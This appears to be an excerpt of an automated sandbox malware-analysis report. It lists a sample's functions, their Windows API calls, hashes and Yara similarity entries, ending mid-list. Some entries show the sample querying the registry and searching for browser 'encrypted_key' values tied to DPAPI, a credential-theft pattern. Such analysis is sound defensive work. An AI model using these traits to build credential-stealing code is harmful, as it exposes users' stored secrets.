                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Find$CloseFileNext
                            • String ID:
                            • API String ID: 1875835556-0
                            • Opcode ID: 0a0829494ac322ec7eb6b69f9c022a46d2da14a56976b4e101bccf266debe59d
                            • Instruction ID: 56d4ae3bb10147b5d59eebde005d892a01f6b0c70f5efeb89a69276c81cc321d
                            • Opcode Fuzzy Hash: 0a0829494ac322ec7eb6b69f9c022a46d2da14a56976b4e101bccf266debe59d
                            • Instruction Fuzzy Hash: 7B020A70A01221CFDB68CF19E594B25B7E5BF44719B19C0AED8499B3A2D772EC92CF40
                            Function 0012E363 Relevance: 10.9, APIs: 7, Instructions: 441stringfileCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 0012E6C5
                            • lstrcpy.KERNEL32(00000000,?), ref: 0012E6EE
                            • lstrcpy.KERNEL32(00000000,?), ref: 0012E727
                            • lstrcpy.KERNEL32(00000000,?), ref: 0012E74D
                            • lstrcpy.KERNEL32(00000000,?), ref: 0012E784
                            • FindNextFileA.KERNEL32(00000000,?), ref: 0012E7BA
                            • FindClose.KERNEL32(00000000), ref: 0012E7C9
                              • Part of subcall function 00121530: lstrcpy.KERNEL32(00000000,?), ref: 00121557
                              • Part of subcall function 00121530: lstrcpy.KERNEL32(00000000,?), ref: 00121579
                              • Part of subcall function 00121530: lstrcpy.KERNEL32(00000000,?), ref: 0012159B
                              • Part of subcall function 00121530: lstrcpy.KERNEL32(00000000,?), ref: 001215FF
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Find$CloseFileNext
                            • String ID:
                            • API String ID: 1875835556-0
                            • Opcode ID: 0a0829494ac322ec7eb6b69f9c022a46d2da14a56976b4e101bccf266debe59d
                            • Instruction ID: 56d4ae3bb10147b5d59eebde005d892a01f6b0c70f5efeb89a69276c81cc321d
                            • Opcode Fuzzy Hash: 0a0829494ac322ec7eb6b69f9c022a46d2da14a56976b4e101bccf266debe59d
                            • Instruction Fuzzy Hash: 7B020A70A01221CFDB68CF19E594B25B7E5BF44719B19C0AED8499B3A2D772EC92CF40
                            Function 0012E3AA Relevance: 10.9, APIs: 7, Instructions: 441stringfileCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 0012E6C5
                            • lstrcpy.KERNEL32(00000000,?), ref: 0012E6EE
                            • lstrcpy.KERNEL32(00000000,?), ref: 0012E727
                            • lstrcpy.KERNEL32(00000000,?), ref: 0012E74D
                            • lstrcpy.KERNEL32(00000000,?), ref: 0012E784
                            • FindNextFileA.KERNEL32(00000000,?), ref: 0012E7BA
                            • FindClose.KERNEL32(00000000), ref: 0012E7C9
                              • Part of subcall function 00121530: lstrcpy.KERNEL32(00000000,?), ref: 00121557
                              • Part of subcall function 00121530: lstrcpy.KERNEL32(00000000,?), ref: 00121579
                              • Part of subcall function 00121530: lstrcpy.KERNEL32(00000000,?), ref: 0012159B
                              • Part of subcall function 00121530: lstrcpy.KERNEL32(00000000,?), ref: 001215FF
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Find$CloseFileNext
                            • String ID:
                            • API String ID: 1875835556-0
                            • Opcode ID: 0a0829494ac322ec7eb6b69f9c022a46d2da14a56976b4e101bccf266debe59d
                            • Instruction ID: 56d4ae3bb10147b5d59eebde005d892a01f6b0c70f5efeb89a69276c81cc321d
                            • Opcode Fuzzy Hash: 0a0829494ac322ec7eb6b69f9c022a46d2da14a56976b4e101bccf266debe59d
                            • Instruction Fuzzy Hash: 7B020A70A01221CFDB68CF19E594B25B7E5BF44719B19C0AED8499B3A2D772EC92CF40
                            Function 00138520 Relevance: 10.6, APIs: 7, Instructions: 147stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlen.KERNEL32(00000000), ref: 00138575
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 001385AC
                            • lstrlen.KERNEL32(00000000), ref: 001385F2
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00138629
                            • lstrlen.KERNEL32(00000000), ref: 0013863F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0013866E
                            • StrCmpCA.SHLWAPI(00000000,00154C44), ref: 0013867E
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen
                            • String ID:
                            • API String ID: 2001356338-0
                            • Opcode ID: 1f629629997faf382019afc9715b30159206f1d3f42087b766d77df04a14ec7f
                            • Instruction ID: 45d8a1f60c2476a17331cdd72ea71dad35ec20b272d1bfc0c555d6a5d0a2b152
                            • Opcode Fuzzy Hash: 1f629629997faf382019afc9715b30159206f1d3f42087b766d77df04a14ec7f
                            • Instruction Fuzzy Hash: AB51ABB19002129FDB24DF69D899A9ABBF8EF88304F248459FC86DB255EF34D941CB50
                            Function 00142AE0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49registrymemoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00142AF5
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00142AFC
                            • RegOpenKeyExA.ADVAPI32(80000002,013EC140,00000000,00020119,00142A79), ref: 00142B1B
                            • RegQueryValueExA.ADVAPI32(00142A79,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00142B35
                            • RegCloseKey.ADVAPI32(00142A79), ref: 00142B3F
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID: CurrentBuildNumber
                            • API String ID: 3225020163-1022791448
                            • Opcode ID: 64b7c27cadb95ed23859e69a6a4a1dd3f248d49d3ab6bc0a2694b926ebd968df
                            • Instruction ID: 084d5894c22ad2974e950666bd9c39c19075d325ad299da47e369c9c06623709
                            • Opcode Fuzzy Hash: 64b7c27cadb95ed23859e69a6a4a1dd3f248d49d3ab6bc0a2694b926ebd968df
                            • Instruction Fuzzy Hash: B201B175A00314ABD311CFA0DC59FAB7BBCEB48716F100099FE45972A0EB3059448790
                            Function 00142A50 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47registrymemoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00142A65
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00142A6C
                              • Part of subcall function 00142AE0: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00142AF5
                              • Part of subcall function 00142AE0: RtlAllocateHeap.NTDLL(00000000), ref: 00142AFC
                              • Part of subcall function 00142AE0: RegOpenKeyExA.ADVAPI32(80000002,013EC140,00000000,00020119,00142A79), ref: 00142B1B
                              • Part of subcall function 00142AE0: RegQueryValueExA.ADVAPI32(00142A79,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00142B35
                              • Part of subcall function 00142AE0: RegCloseKey.ADVAPI32(00142A79), ref: 00142B3F
                            • RegOpenKeyExA.ADVAPI32(80000002,013EC140,00000000,00020119,00139650), ref: 00142AA1
                            • RegQueryValueExA.ADVAPI32(00139650,013FE058,00000000,00000000,00000000,000000FF), ref: 00142ABC
                            • RegCloseKey.ADVAPI32(00139650), ref: 00142AC6
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID: Windows 11
                            • API String ID: 3225020163-2517555085
                            • Opcode ID: 9cf0f649100aa49b11a56dd3d1987ffbf849bfd473b9a06a5d300d022fece44d
                            • Instruction ID: 14cce082495f358e036eb69c9e8c2dd56460523dce14aea5d796da13705993ae
                            • Opcode Fuzzy Hash: 9cf0f649100aa49b11a56dd3d1987ffbf849bfd473b9a06a5d300d022fece44d
                            • Instruction Fuzzy Hash: C201ADB1600308BBDB20DBA4EC49FAA777CEB44316F100595FE08E72A0EA7099448BA0
                            Function 001271F0 Relevance: 9.1, APIs: 6, Instructions: 142memorylibraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • LoadLibraryA.KERNEL32(?), ref: 0012723E
                            • GetProcessHeap.KERNEL32(00000008,00000010), ref: 00127279
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00127280
                            • GetProcessHeap.KERNEL32(00000000,?), ref: 001272C3
                            • HeapFree.KERNEL32(00000000), ref: 001272CA
                            • GetProcAddress.KERNEL32(00000000,?), ref: 00127329
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$Process$AddressAllocateFreeLibraryLoadProc
                            • String ID:
                            • API String ID: 174687898-0
                            • Opcode ID: 07e3ec68affea344bd5b27a0b02fe16f9716ca6ed3ed3ce5c8e47c695b3b997e
                            • Instruction ID: 30d83d0f5a21325fedae3ba7563f3cb4b84d63230f9fe1baf73534f742faddf0
                            • Opcode Fuzzy Hash: 07e3ec68affea344bd5b27a0b02fe16f9716ca6ed3ed3ce5c8e47c695b3b997e
                            • Instruction Fuzzy Hash: 4E414B71605716DBDB24CF69EC84BABF3E8FB88315F144569EC49C7390E731E9209A50
                            Function 0013D9A0 Relevance: 9.1, APIs: 6, Instructions: 127registrystringCOMMON
                            Download Yara Rule
                            APIs
                            • memset.MSVCRT ref: 0013D9C6
                            • RegOpenKeyExA.ADVAPI32(80000001,013FD8D8,00000000,00020119,?), ref: 0013D9E5
                            • RegQueryValueExA.ADVAPI32(?,013FE550,00000000,00000000,00000000,000000FF), ref: 0013DA09
                            • RegCloseKey.ADVAPI32(?), ref: 0013DA13
                            • lstrcat.KERNEL32(?,00000000), ref: 0013DA38
                            • lstrcat.KERNEL32(?,013FE490), ref: 0013DA4C
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$CloseOpenQueryValuememset
                            • String ID:
                            • API String ID: 2623679115-0
                            • Opcode ID: f6bfcb71c4e49932563ea924a89ff136b4e306f7dc79486f816e2f77e55194da
                            • Instruction ID: 63436970598a846fdc548d0e36d202d3b47b8c8ffaf270ce37f9c54cb8c2616e
                            • Opcode Fuzzy Hash: f6bfcb71c4e49932563ea924a89ff136b4e306f7dc79486f816e2f77e55194da
                            • Instruction Fuzzy Hash: 65415F71A1025CAFCB54EF64FC82BDE7379AF64305F008164B509A7261EF30AA958B91
                            Function 00129C70 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 124memorystringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000), ref: 00129CA8
                            • LocalAlloc.KERNEL32(00000040,?), ref: 00129CDA
                            • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00129D03
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocLocallstrcpy
                            • String ID: $"encrypted_key":"$DPAPI
                            • API String ID: 2746078483-738592651
                            • Opcode ID: 1620f72281fd9c18bded32a153952473c485eceda7dff912e74627ab2302698d
                            • Instruction ID: d6b71e825f21ab4c71711f22606f03a61012c6e96ee28e6a2345b7bf2b287d8e
                            • Opcode Fuzzy Hash: 1620f72281fd9c18bded32a153952473c485eceda7dff912e74627ab2302698d
                            • Instruction Fuzzy Hash: 6541C571A002399BDF21EFA8FC426EE77B4BF65304F044564E919AB252DB30ED25C790
                            Function 0013EBC0 Relevance: 9.1, APIs: 6, Instructions: 110stringCOMMON
                            Download Yara Rule
                            APIs
                            • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0013EC04
                            • lstrcpy.KERNEL32(00000000,?), ref: 0013EC33
                            • lstrcat.KERNEL32(?,00000000), ref: 0013EC41
                            • lstrcat.KERNEL32(?,0015179C), ref: 0013EC5A
                            • lstrcat.KERNEL32(?,013F9028), ref: 0013EC6D
                            • lstrcat.KERNEL32(?,0015179C), ref: 0013EC7F
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
